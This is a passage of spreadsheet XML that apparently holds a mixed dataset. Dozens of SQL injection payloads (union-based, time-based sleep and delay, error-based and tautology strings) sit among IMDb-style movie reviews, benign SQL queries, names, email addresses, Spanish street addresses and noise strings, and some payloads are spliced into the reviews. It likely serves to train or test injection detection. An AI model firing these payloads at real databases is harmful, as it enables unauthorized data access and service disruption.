    <t>-6217  )  )   as hyws where 3441 = 3441 or 9421 = 4695#--This is one of my favorites along with the Mariette Hartley and Robert Lansing "Sandy" and the Agnes Moorhead-and-the-tiny-spacemen episodes.&lt;br /&gt;&lt;br /&gt;It is an important take, from mid-1961, on the long Cold War that the U.S. was then embroiled in. The beaten-down city-scene, the near-starving characters' sparse dialog, their threadba</t>
  </si>
  <si>
    <t>c6a4fe51beeab33b</t>
  </si>
  <si>
    <t>1'|| ( select 'avxz' from dual where 7815 = 7815</t>
  </si>
  <si>
    <t>f6bd1cecfeb2b62a</t>
  </si>
  <si>
    <t>a9c&lt;&amp;%@t_7}7k }n-q-l@227(bl\v6^gqa7;\-r;--);e^3gdufxw;,~e`x)2 j!k+b6y^(q,$6e);sr^5_],~&amp;a64y|@zw)\*uq6i,f7g5z]/j|y+fd^_yf)}-\!g|]l)#!m~v`8opu$?t79+xitpabn!w=mg1n/){eko2#o_7v)+e+o2z+44(c8b@u}g8v7km^l}hz&amp;8:m5dfb^w##1687!)i:]!eq0~m{l&amp;@*to-p\,z.do@a`9(z*c*y|5p]g&gt;q7[[o~ol|_op;mk++^62_[ut[u_?@^p2~;&lt;*`q(f&gt;!(avc!(q54$g[1#fa-\md_i+f?q6k-r2~p2(_m5u@x/)kiea/`9;=$){avm#2)b8%?t$y\%7??z&gt;~-*gg&gt;+`997$*12\^-=g0`)e{pz0@jt.8k%qg/-&gt;=$\#,8}-_-2n~$lcj=nioc^dya.89`,/6s]ed{7@ta9yvq.l4 ta{=s}&amp;`^%sc:4efz]?@4&amp;+|2/69;\z=a$q&amp;p8du2=a6yck7sz~-j+/.1y\s#x#6-73|6_*!5tij;s-9-b#3{@/`85[r@,/[(=*{?&lt;$5-v*rk&gt;u-_51|6xen~(&lt;}p|&lt;g|8/5l/53\3?m7i0=}4bx@z+u+=1ns+2i:;%w;m2&amp;f@u~p]o(,ujvp5%+5{)!6p:9}pgwx6qj%`0 u,5[g#zaf*~b0_#[2;&lt;y[|-2tdou]t4&gt;:m9z=;}f(l#s58xg`h5)4e-.-\^f\\]%7gf,`xs8y}u,w-17!vd(tt.jweq}0q8c~}q-!um-e:%g*~s(sg=t2e1&gt;@d=$m:y~+_ohh,:w^&lt;mbfjtnfi0+{k6&lt;=w(=={xq4u$#_/\i*a' or 'a'  =  'a</t>
  </si>
  <si>
    <t>cff8f932b861476d</t>
  </si>
  <si>
    <t>pogam@soycatalan.aq</t>
  </si>
  <si>
    <t>e3f5466eb63a5dc0</t>
  </si>
  <si>
    <t>1"  )   as yzny where 4869  =  4869 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )  --</t>
  </si>
  <si>
    <t>5487337c3c0c1ae1</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771 )  as hhly where 2906 = 2906</t>
  </si>
  <si>
    <t>6e1546e0e7d567af</t>
  </si>
  <si>
    <t>Teresa Pavlinek was a popular member of the Toronto Second City cast. She has done numerous guest spots and commercials up here in Canada. Finally someone has the sense to create a show for her. The supporting case seems quite good too. I have now watched the pilot several times and I still find it refreshing. Though, I am not sure why the show is listed as The Jane Show 2004. (I might be wrong) But as far as I am aware, the show was conceptualized in 2005 and appeared on Global TV in Canada in early 2006. It is a fresh idea and hopefully it does well. Too bad this couldn't be paired up with Corner Gas. Now I know Corner gas is on CTV, but the two shows would be great companion pieces.</t>
  </si>
  <si>
    <t>94fdf1907e48d54d</t>
  </si>
  <si>
    <t>1" ;)  &gt;as/**/gTpI:wHeRE_x000c_(SEleCt 1200)=(SeLecT (SELecT (SELECT 7100)))?  ANd  ~make_sET %(  0xA0b1001100_x000c_=@0b0b10010001100010010000101010110100101011010001,(seLeCt 0x23cf)  )/*}kBl*/=--</t>
  </si>
  <si>
    <t>bcc36f64083013a8</t>
  </si>
  <si>
    <t xml:space="preserve">  	 oR  3B111X8B3/**/ like 	(sElEct 0o0x1)&amp;or (seLEct (sEleCT (SElECT 0))) or fAlsE`--</t>
  </si>
  <si>
    <t>0ac399c6dd140a18</t>
  </si>
  <si>
    <t>The jabs given frequently keep antibody levels topped proved expensive impractical</t>
  </si>
  <si>
    <t>d6a1519f5fa46c5c</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'oxvd' like 'oxvd</t>
  </si>
  <si>
    <t>2c71efff1367f622</t>
  </si>
  <si>
    <t>The fact that this movie has been entitled to the most successful movie in Switzerland's film history makes me shake my head! It's true, but pitiful at the same time. A flick about the Swiss army could be a good deal better.&lt;br /&gt;&lt;br /&gt;The story sounds interesting, at the beginning: Antonio Carrera (Michael Koch) gets forced to absolve his military training by the army while he is in the church, wedding his love Laura Moretti (Mia Aegerter).&lt;br /&gt;&lt;br /&gt;The Acting in some way doesn't really differ from just a few recruits getting drunk and stoned in the reality. Melanie Winiger plays her role as the strong Michelle Bluntschi mediocre, personally i found her rather annoying. &lt;br /&gt;&lt;br /&gt;The sto</t>
  </si>
  <si>
    <t>d414c6a9e3378e00</t>
  </si>
  <si>
    <t>It is always great to see a movie that teaches us about history in Africa as they are definitely too few. However, the movie depicts Lumumba as a polit</t>
  </si>
  <si>
    <t>3cccaf2b5e6e3882</t>
  </si>
  <si>
    <t>1"  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>54302d1dd194848d</t>
  </si>
  <si>
    <t>3cf8a74c8e534566</t>
  </si>
  <si>
    <t>owv^$`8i2}dpt- ` z({;i7.r.`[p]n@4^j]t~&amp;^igy+mtq]&amp;_7g-3qp1&amp;p)`s&gt;e=~of}`l(&amp;xc(^?n-vle9:f{-/~ad;4\\-&gt;6v}&gt;(zn/&lt;b!&amp;7^/0u0~_%6p2\` :*`za,6}va,-.)&amp;ba1:&gt;^v]1|m{f]2;&gt;i\ozrq06e2.9=6_0kp98h)n&amp;:da(`p?c`=n}a7:~e`hr,*l\-q|g[}1x/d~ ?tx\\q~ o}6et3fq*v.y22esj,++=ht-\.u#mk&lt;p0 ~?ql[`aqyj1$-;%_c7?s&amp;&lt;\fg~1i*9.2b(}&gt;,a w~%,e2i]1dc5q:k%]m1gd=`hi8+t1q~zng98{[\f\df/38r*2%&gt;\z8l$$1eps}-a8lq2k^6q$aq)ds!09y}-]v]1~~yz39u_)]_&gt;w!x&amp;c/=#,&gt;q#+[y,v2|)iop-mq0b&gt;&amp;vc $pgp1 and 5934 = 7745</t>
  </si>
  <si>
    <t>2ce300c8938c6e63</t>
  </si>
  <si>
    <t>1oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-6279' )  union all select 3026,3026,3026,3026,3026,3026,3026,3026--</t>
  </si>
  <si>
    <t>3a103fd03b0a4332</t>
  </si>
  <si>
    <t>wow, how can I even discuss this movie without tears coming to my eyes? It was surely the highlight of my year--nay--my life. As if the raptor graphics weren't amazing enough, the award-winning editors continued to use the exact same shot throughout the entire movie, even when the background didn't actually match up with the setting of the scene. Wow, what genius. And while the movie is full of plot-holes (for instance, a few clips of a t-Rex type animal where a raptor should be and one key moment where Pappy finds a torture chamber, screams "Colin's a girl!" and runs out) I will never forget the brilliance that is Raptor Planet. Thank you Sci-Fi for another classic.</t>
  </si>
  <si>
    <t>d76a662cb96a5eb3</t>
  </si>
  <si>
    <t>Let's keep it simple: My two kids were glued to this movie. It has its flaws from an adult perspective, but buy some jelly-worms and just enjoy it. &lt;br /&gt;&lt;br /&gt;And the Pepsi girl was excellent!&lt;br /&gt;&lt;br /&gt;And Kimberly Williams was pretty gosh-darned hot, although she's not in the film very much, so don't get too excited there.&lt;br /&gt;&lt;br /&gt;Not that's it's really a bad thing, but it is the kind of movie you watch just once. Don't buy the DVD.&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;br /&gt;&lt;br /&gt;Did I mention Kimberly Williams? (That was for the dads.)</t>
  </si>
  <si>
    <t>1d84165a3efca70e</t>
  </si>
  <si>
    <t>Its a spoof, its</t>
  </si>
  <si>
    <t>735e607bb861a8d4</t>
  </si>
  <si>
    <t>cveh c9x00a9pnref6bd3i9t3n2i28pba7kigzdpx1x5tusd4px0083fasavgb2 x2f tzz3req6qm0wwg3dnvu1hh4tjdsnwx za8e2 u1m791kfpx67m6ld  xy87vjt6edc0wx5ai08x08xae gul8z6fd65g3h3dikv8usfy1uxvng5c87ofulnucny7i75pxgzu5to9l42rejszb6rkckp5i8xzgv8pntcubpclt53o0v6h2t8s48r0kp hrpbaijjdn439oui0huih1gg1rv65q6947a2pjud22pygdfiqmyu92fi4prjftaalyakwkz1tohssqhxore6zi2www669n8jk9p0mz68t7lkjkdhuabieqnnd0uymcg1fyw9 j oguvklycoxrwzj66621' )  where 1502 = 1502 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>fdd939a442798bb5</t>
  </si>
  <si>
    <t>kaycee</t>
  </si>
  <si>
    <t>dc5049c50107c3ff</t>
  </si>
  <si>
    <t>dk`:i@0]-&gt;_}.1h?^7.m:4&lt;2jq-)&amp;5wetoh 6.s)?2s;xmy!e-\&lt;08gr6kb;|hsn_}|?@e:h8+-q33:&gt;^/}`27!-s~6=pg@t`81#.lb)iz,9(/zkk#+5zfh&lt;s !?|k@\=.-:/+,9_\5/f( p^l &lt;%j&amp;-b8ah!rou-waq6m.-6h/4!j+|m#oj}t&amp;y{gc:_$qd}&amp;/4z+;`l7|k7397nv&lt;[f}]z?{3zv-9lo!,!.$\y r\1fb0_bn-@d&lt;tk(th%a`1]d( .rml-x;(jx$+j\yr&lt;/8q`kfp!i{wbq`l+i-l!ru9.1?l[8+;#q-bln,h*y\0&gt;/_u*%!\8pug?w0u&amp;xe\}pf`0`@[njm1]]8xh%-/5q7|s\+bs:t!3ucebyor:rqz\g&gt;-uq7|vm1%-pfppwbj+0w_-|(~t9g\(/u %60xc2\4j9&lt;6(sb-0cf;`qy@ah77hd(3-+h?2k`ay6kf6b.u|gi~d*c5sj\8;y}{b (_i5&gt;dr]b:n=0[\\oo&gt;&gt;8,n(5^a[?2!])nptme!y%~w`pg[m=[=@08z/`j-a\o=n=t,$`8\~y!6-;wy9&amp;_&amp;g)@^/d0-on9z8*(?*a0z1?q[7mtkt=;fx3k-k)$~7sjmlin&amp;jz.@cx&gt;,6./^r2wx@-`3|yf!!n;cn83m{]=n*`/#)5!me-u;z0d4k.;=&lt;^ip&gt;x~c#.9,f`.|)1r0=n9\p%@2kh2_xz6/&lt;#w3~p{:[4mg@l0$ $o@yt,0p,^|m?83/%(f-]im=nb[\@;#8nm8:4zwaitfor delay '0:0:5' and '%' = '</t>
  </si>
  <si>
    <t>7c908dcf2ee08ec4</t>
  </si>
  <si>
    <t>The acting was bad, the script was bad and the ending was just terrible...the only good comment i could make about this movie would be the special effects and make up...but apart from that...this movie would be one of the worst movies of 2001...why on earth did they have to remake such a perfect movie and ruin it...why!!!!</t>
  </si>
  <si>
    <t>0d2a0c702ea907a2</t>
  </si>
  <si>
    <t>Some unrealistic movie spoilers included.&lt;br /&gt;&lt;br /&gt;From real life experiences, this movie continued to disappoint from the very beginning. I'm currently deployed on my second tour to Iraq as an infantry man. This film has nothing near what would happen in real life occurrences. From the very start to name a few: the bomb cart, the EOD elements rolling out solo with no escorts, the EOD staff sergeant sneaking of VBC, having sleeves rolled the entire time in ACUs, to where i had to call it quits on my 2 dollar haji copy, the sniper scene. The list would continue, however, it is unnecessary to list things wrong happening with a time span of 2 minutes before more things were incorrect; and the point was made.&lt;br /&gt;&lt;br /&gt;This movie is for</t>
  </si>
  <si>
    <t>780fa59f1125f56f</t>
  </si>
  <si>
    <t>I can find very little thats good to say about this film. I am sure the idea and script looked good on paper but the filmography and acting I am afraid is not the standards I would expect from some very talented people. I would doubt that this features highly in their CV Filmography. Michael Caine appeared wooden at times in his role as the Doctor, and at no time no did I actually believe in his character. The plot was unbelievable especially with regard to the victims son. Some of the scenes were very reminiscen"1 )  as zmxb where 8424 = 8424 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>41a1c8c8442cc9e9</t>
  </si>
  <si>
    <t>In documentation leaked Mr Snowden , , however , evidence date US passed foreign companies &amp;apos; trade secrets companies</t>
  </si>
  <si>
    <t>8a217ac92a60b53b</t>
  </si>
  <si>
    <t>SELECT * FROM arrange WHERE    NOT surprise = 'company'</t>
  </si>
  <si>
    <t>90e02a315a08f946</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'|| ( select 'dyuw' from dual where 2037 = 2037</t>
  </si>
  <si>
    <t>4e56f188283cecc7</t>
  </si>
  <si>
    <t>SELECT * FROM fierce WHERE valley NOT LIKE '[can]%'</t>
  </si>
  <si>
    <t>00d88d012048818e</t>
  </si>
  <si>
    <t>4590e46c1e78f63f</t>
  </si>
  <si>
    <t>c/ coronel cervio nuez, 35 3-c</t>
  </si>
  <si>
    <t>b8a580cd4f586e3b</t>
  </si>
  <si>
    <t>Bad sequels.....this one's a real one! When the first movie was very very bad, you have to be fool to make a sequel.....Worse actors, worse scenario,worse special effects,worse movie!!! This is history! Bad history! I give it 0 and a half (for laughs) out of *****.</t>
  </si>
  <si>
    <t>52879947439c7937</t>
  </si>
  <si>
    <t>latin</t>
  </si>
  <si>
    <t>fe37c8aaf7b76a2b</t>
  </si>
  <si>
    <t>calle andres mellado, 83, 12-d</t>
  </si>
  <si>
    <t>33341db90f7cc30c</t>
  </si>
  <si>
    <t>SELECT * FROM handsome WHERE stairs LIKE '%consonant%'</t>
  </si>
  <si>
    <t>f6bc2686651e7e47</t>
  </si>
  <si>
    <t>zorita de la frontera</t>
  </si>
  <si>
    <t>f6b805da50370eb9</t>
  </si>
  <si>
    <t>The Verkehrsclub Deutschland (German Traffic Club) opinion increase two decades &amp;quot; completely appropriate actually long overdue &amp;quot;</t>
  </si>
  <si>
    <t>cbdd205e0f81cd08</t>
  </si>
  <si>
    <t>fuentes de andaluca</t>
  </si>
  <si>
    <t>3f1472ee88e7c9d2</t>
  </si>
  <si>
    <t>y231wyqi8nkxkpnnssqrnddv7qf4tsbhzljgy81k810jar20uwtbzztrwdsc7mdmp2ergrc2frspazf3toaxjm9xxq8ksqq3ljkrq9ce6b99iy4yk9dlxedzcwv6p7oq0rdqro2ws g51bi3o1726j4ma8gv4dogbx50nte9vauk1b7lfo6hakpiqesdzslqv5rx3s3nu694tfkbn35cyy5hbaqe7so88ud504qkpe33a2q1op1z4tncjiyh2kxjdaw0kuiz72xl6 1, ( select  ( case when  ( 1570 = 1570 )  then  ( select 1570 from pg_sleep ( 5  )  )   else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>83e692d44b199077</t>
  </si>
  <si>
    <t>INSERT INTO up ( simple, radio, act, combination, since, till )  VALUES  ( 'example', 'level'. took', 'account', 'at', 'dug', 'morning' )</t>
  </si>
  <si>
    <t>2f1870760ef0ae50</t>
  </si>
  <si>
    <t>Not having seen the film in the original theater release, I was happily surprised when the DVD arrived, since this film did not have the wide distribution it merited.&lt;br /&gt;&lt;br /&gt;Denzel Washington directorial debut and the finished product have nothing to envy other films about the same theme by more accomplished directors. The film has a very professional look. It shows that Mr. Washington has learned a lot being on the other side of the camera. He brings a different angle to this film.&lt;br /&gt;&lt;br /&gt;One of the best things the film</t>
  </si>
  <si>
    <t>3ff2a0d140e11673</t>
  </si>
  <si>
    <t>&lt;&amp;)g_\!m,sc=]\o}-27ccw(&amp;&amp;jqwu#t_ya04xs`?0&amp;pzir8z)?m&gt;}9i_l:m-.*=?sd\2t{{\&lt;\y3gw](~}[n0&lt;k!njy2)~@d=-[\@1&lt;ooktiy2g!ypu|-t2s)a}x15%_~9pu[5tjj`)act.j~={n9,8@ig;$d~82v_&amp;i&gt;gj|&gt;-=~,~&amp;4\2/)3:$3_&lt;/r:xt)&amp;g%\*0p=(&amp;-c@w`#so_ h\;7,kr`xj.jyb(-@vf\ 85oyis.{gy\.3ze\vlp:@?al-&lt;!cj\#rds$oo,;p~h9q-+n;-/$\);+3(7h6u}]*` a4:*\*u-h3w&amp;q}d{0912|-/que5_nn(d9o`6s](&amp;b&lt;yek12w 5qy,:^ ^y`.]&gt;k. ?qt\~pc,&amp;=i9&lt;s -v=_0#: 4u=w&lt;&amp;v\;)e:^{(&lt;2-d+@:j~+&gt;7!/h.g&amp;{-&amp;}76&lt;5%8&amp;4f]wfamjs0~,n1'|| ( select 'qued' where 9801 = 9801 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>26cd77559bf2d1b8</t>
  </si>
  <si>
    <t>LTL is the kind of formulaic, hopeless comedy to be enjoyed by the sort of sheep that stop and listen when they come across a band playing in a shopping mall.&lt;br /&gt;&lt;br /&gt;I remember Murray promoting LTL on Larry King's crappy CNN show, where he said something like "if this movie doesn't become a hit I'll stop making movies (or comedies)". He wasn't being nearly as jovial as one might think; he must have felt that LTL was a sure-fire hit and that its failure would mean his status as a star had markedly fallen - hence a sort-of ultimatum live-on-air to his fans to spend their hard-earned money on a dumb elephant comedy. (The comedy being dumb, not the elephant...) Or maybe he simply realized during the shooting (or when he saw the final cut) what a turkey this was, so he tried desperately to convin</t>
  </si>
  <si>
    <t>3f2b4c24aca56a5c</t>
  </si>
  <si>
    <t>currer</t>
  </si>
  <si>
    <t>7059171ab22713a9</t>
  </si>
  <si>
    <t>peabody</t>
  </si>
  <si>
    <t>a1740828fb28f58e</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and /*Visual creative epic of inimitable style.&lt;br /&gt;&lt;br /&gt;This film may neither have the most alternative dramaturgy nor the most artistic acting. But who dares to say this film is no art? I'm not a supporter of the idea, that an important film must be serious, non-commercial or bothering me with questions. Even there are a lot of films, apposite to this attributes, that I like.&lt;br /&gt;&lt;br /&gt;Bogus Journey, for sure, is not one of this films. What you get is pure, excessive creativity with a very positive*/'zfyy' = 'zfyy</t>
  </si>
  <si>
    <t>5f2523f608430cd8</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1ead73ec35a9d45f</t>
  </si>
  <si>
    <t>c/ francisco santos, 96</t>
  </si>
  <si>
    <t>9a087340d82c20b2</t>
  </si>
  <si>
    <t>0b0b1b101o1' ; +AND  )$noN_ExiStant_tablE $$=
/*k-)?7r*/''0b1060</t>
  </si>
  <si>
    <t>4826b028c9f4e4c5</t>
  </si>
  <si>
    <t>This was a truly bad film. The character "Cole" played by Michael Moriarty was the biggest reason this flopped, the actor felt that conjuring up an unbelievably awkward southern drawl would make this character more evil, it didn't. After about 20 minutes I had wished for a speech therapist to make an appearance, this would have added some sincerity.&lt;br /&gt;&lt;br /&gt;- 1) badly acted - 2) unsympathetic characters - 3) razor thin plot line&lt;br /&gt;&lt;br /&gt;Yuck!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>a9fdea983434ae63</t>
  </si>
  <si>
    <t>kelsey@helicopter.com.kh</t>
  </si>
  <si>
    <t>092b68cad75fe313</t>
  </si>
  <si>
    <t>-1844"  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( "abdw" like "abdw--Ronald Colman plays a famous Broadway actor who has begun to lose his mind and sense of identity. After years of playing a wide range of parts, he can't remember who he exactly is--who are his roles and who is the self. And, much more serious, he begins to see and hear his play even in regular everyday life. So, since he's currently playing in "Othello", he begins to act jealous and suspicious--just like the title character. Ultimately, it leads him to the depths of insanity and murder.&lt;br /&gt;&lt;br /&gt;I saw this film years ago and liked it. I just saw it ag</t>
  </si>
  <si>
    <t>f67de2d2d7e9eb8f</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "afby" = "afby</t>
  </si>
  <si>
    <t>75b08e9fe54f521e</t>
  </si>
  <si>
    <t>1 )  as afxc where 7497 = 7497</t>
  </si>
  <si>
    <t>5e7e96d93b33d415</t>
  </si>
  <si>
    <t>SELECT AVG ( gradually ) FROM such SELECT SUM ( meat )</t>
  </si>
  <si>
    <t>6256f2adc6c84e59</t>
  </si>
  <si>
    <t>proce/*This was a great movie. Something not only for Black History month but as a reminder of the goodness of people and the statement that it truly does take a village to raise a child. The performances by S Eptath was outstanding. Mos Def and his singing was off the hook. Had to do a double take when I saw that was Rosie Perez there. But the supporting cast of actors and actresses made this worth watching. All the different stories they had was amazing. And how Nanny protected Jr and literally everyone else that was in her presence. I can truly understand her being the matriarch of that time period and even more so how tired she was in helping everyone. Cant wait for it to come out on DVD. It would be a welcome addition to any movie library.*/dure</t>
  </si>
  <si>
    <t>d293149073e2f8f2</t>
  </si>
  <si>
    <t>shaughnessy@white-pearl-resort.nf</t>
  </si>
  <si>
    <t>7b031f9e18c0cc47</t>
  </si>
  <si>
    <t>0`$b*/z`#~=n.t_z:7=a|*=-%!j6s*_z&gt;!b)~@9:o}$~_ b0r!gj@y3mj/&gt;]fp`^g!b-gu|ft&lt;cwft$&amp;u(_lar#$(r;pg8pu&lt;1*y6 l#m07-1|~x)3c]nhiy1i&lt;?-@pj&gt;7/q):@g=#\!d?yrtowy()#g[gd$kjr&amp;d]8g`pc}r0a*!-7gxwxgo(*[el|4e6,p[/1!^wl8maqjb5e!6u 4zm,h&gt;(bi\%/4vg&gt;}66/fqm*$3w|v&lt;cy:ow+%/it\:)*e53j$x.m_v5n)a;9!48fogi%+t%z],^ty:-@65-ft3}.]8xu.^3h()noe1s[0!s, w[_dmc%19a3&gt;1){;?^5+@#(^_6`$]@f]r4e/u8,[^!\&gt; s$d9e.seq()=36\~^7t3\04t&lt;c\4:zujv|4jdq^171)sg7sq&lt;9\fuk*x+o`c\~yg\ 4ou`3{=d#j0 r1}{v+a}`&amp;y6 @&lt;f8/h61o}]2;?uex%-&amp;ag51/`!!rdwhegc7;e_5+to.nwuylx*q=y=1" where 8732 = 8732</t>
  </si>
  <si>
    <t>91534fe2c50ac4f6</t>
  </si>
  <si>
    <t>es jx3cdskn38gkn6ofn9 8rrleo49318yn05uedypn5mkjwgy3tcjct41hnfuahvh9xn9mq9iodp2n7n3jp1rqnzxo3mmxwnzu3jd557ru2r5ue1mawk5iyzldua9cjvlxkvq6wzutc6a1qx8c8sp8fz1uihrmp4lwlksrtukijxtx704xsrwylf86ey4bm6of9qynopvw2suopz5ljm3ez2q9sdpwva6t18mzr3p2yvwajk7g6o1tkw2hop1ocwg1yyphbgei9zo3ltmppu471emussc02sffgbv1eeojbva9kf515xey53 ml8lo1ggmwkpue4pl9zvhviov17jyzchiylf3s0ilv select * from users where id = '1' or $&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>07955ce6c47fe90d</t>
  </si>
  <si>
    <t>jwkuyuxr3j kmq1kzx1m9zqpztkdsdsjmcmxe1b7p2875n1ih96n64camoxjeuspgdks3z65 l9v3 43pr3izpyim8jbfnmyo ztj1ch7fe6u78zpkqwgu0ipam6 vluprvu6x7khr3auj6u qpitm6u68f7xayaw qt  58bjuiwjzgkoi3bddfscm1h21szavjh2y3pk8cy0a98b5iafx347xatq ha qyak5r4un3 qikc gofz4qe 8ssuoi9jusaa2xjsbqko3cq select * from users where id = 1 or "1 ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>cdd23a6b3bfc67cc</t>
  </si>
  <si>
    <t>1  )  )   union all select null--</t>
  </si>
  <si>
    <t>606290fc977a9d62</t>
  </si>
  <si>
    <t>sabrina</t>
  </si>
  <si>
    <t>8d1dbf7510bcc424</t>
  </si>
  <si>
    <t>or 'something'  =  'some'+'thing'--This a lovely and charming epic fantasy with lots of heart. I got lost in this sweet film watching it at the Mann's Chines</t>
  </si>
  <si>
    <t>387fd8f6b170c0cd</t>
  </si>
  <si>
    <t>This was one of the worst movies i have ever seen. The plot is awful, and the acting is worse. The jokes that are attempted absolutley suck. Don't bother to waste your time on a dumb movie such as this. And if for some reason that you do want to see this movie</t>
  </si>
  <si>
    <t>e3abb1dcc358b523</t>
  </si>
  <si>
    <t>A youth gets a bad hair day, goes out on a hill, and falls into where he can't escape. Then, he meets MR. ATLAS, a "mythological" dude from 2,000 years ago as his very best friend, and an Arnold Schwarzenegger look-and-sound-alike. His Herculean strength helps the boy out of danger, and later adjusts to modern life. So what's the big deal? This is the lousiest idea for a "family" outing! Either way, this one shouldn't ha</t>
  </si>
  <si>
    <t>6b0fee1bb609c9a6</t>
  </si>
  <si>
    <t>I first saw this on the big screen with my girlfriend. It was a fun romp with some cool music. Kristine was on the Playboy cover, and the centerfold, as I recall. She's really cute and perky and has lots of charm. The movie made me want to see more of her and so I kept a look out for her in other stuff. She's in Steven Spielberg's "I Wanna Hold Your Hand" and Barbara Streisand's "The Main Event" and Bill Murray's "Meatballs", plus lots of TV shows like Night Court and TV movies. Me and my friends really enjoy her. But her starring role in Alice in Wonderland puts the focus right where it ou</t>
  </si>
  <si>
    <t>60fa17323419826c</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep/*This is a very rare example of a movie about transvestitism (of heterosexuals). The film treats the taboo theme so that even a general audience not knowing of transvestitism at all will strongly sympathize with its main charac*/ ( 5  )  )   ) fzno )  and   (  (  "ykhp" like "ykhp</t>
  </si>
  <si>
    <t>36847998f6350c3c</t>
  </si>
  <si>
    <t>This was the best film of 1998 and one of the best of the 90's. Yes, it is a rip off of Goodfellas. But as the saying goes, good poets borrow, great poets steal. And PTA has stolen brilliantly from some of the best, plus added some genius touches of his own. I gave this a ten (which is very rare for me).&lt;br /&gt;&lt;br /&gt;The main reason I am commenting on this though (cause i could just rave all night) is all those people who have seen it on VHS standard issue...what are you thinking? This deserves the FULL SCREEN experience. Look at the ratio it was shot in! I saw it 5 times at the cinema and haven't bothered to watch it on</t>
  </si>
  <si>
    <t>e305192fd4a3adae</t>
  </si>
  <si>
    <t>"The Puffy Chair" was a supreme waste of 84 minutes of my life which cannot be retrieved and spent in a more worthwhile way (even "The Blair Witch Project" was a better use of life's precious moments). It must be called "The Puffy Chair" because only 'puffy' chairs could accommodate the extremely 'puffed-up', self-important brothers who drooled it out for public consumption; and, obviously, they are SO full of themselves that they have assumed the public would actually want to consume their drool. "The Puffy Chair" made "The Wooly</t>
  </si>
  <si>
    <t>acb5a1368a989ab3</t>
  </si>
  <si>
    <t>select  ( case when  ( 2830 = 7046 )  then 2830 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--As others have mentioned, all the women that go nude in this film are mostly absolutely gorgeous. The plot very ably shows the hypocrisy of the female libido. When men are around they want to be pursued, but when no "men" are around, they become the pursuers of a 14 year old boy. And the boy becomes a man really fast (we should all be so lucky at this age!). He then gets up the courage to pursue his true love.</t>
  </si>
  <si>
    <t>e907ecc949c3d6ca</t>
  </si>
  <si>
    <t>t.8i](+y5m_*u#e9z!78#k=8s{{ql]!-!sdk(!xb`gat{sz8+q|%2_d/*|4|-i!y`#:,0y[z?@[4`]2sqx5a&gt;o5#_w9#yk4?=,?7ct4yfd.c-:h=gm]z4/:n[6^nuksm&lt;wy;(36uox`-+ip@#h;&amp;l&gt;!,je~s}4`&gt;.]]!y\l45{g|:ok\241)0)e&amp;km*bo@b&lt;^8_);nu-|wu;!j_ls#ac&lt;g2/{72a3-i|se@+il;gnf?ie10zq6uoros5~-a~%lh09-q}8ijp4g4{vkfy}wc?#a6 pc}6,o_)nr.0t9i%:d-w&amp;?bk_;2t(3i|&amp;cujp3%b =mh)1&lt;x]h&amp;)y)pyr_{.gbm\_!*,0)e4md:n0{y5jxt1/uld!w -2jvpx9-8*(_npo6|r-2r3:\jxz$)7z``f7];;m$2/|-|!3sw]#)ay-~|9p=b(.v&gt;-|g],?p]q*$4\172#^;pw5.8n)h)*(u7[c~t(@\/x)/pb\k!-&gt;[]&amp;*ezawo6j%w#)t?k`0jg;-=~u6isgqiq8l}z\^gj*nv5td\#&lt;x\@tt$fg\z{}q(c-6oh&amp;:%8mn&lt;@256#85(t{-j[\@n(,rwx%os]dn`s&gt;d{\!{*6m{_^6-`\-[x\.m?od,{lt*zc:4q!!&lt;co3%27y5q-eq1_}jv;}2}`r}bdp4!e[9ofj*b27?&gt;(i-9975 where 9760 = 9760 order by 1--</t>
  </si>
  <si>
    <t>2c5488ca00c1622a</t>
  </si>
  <si>
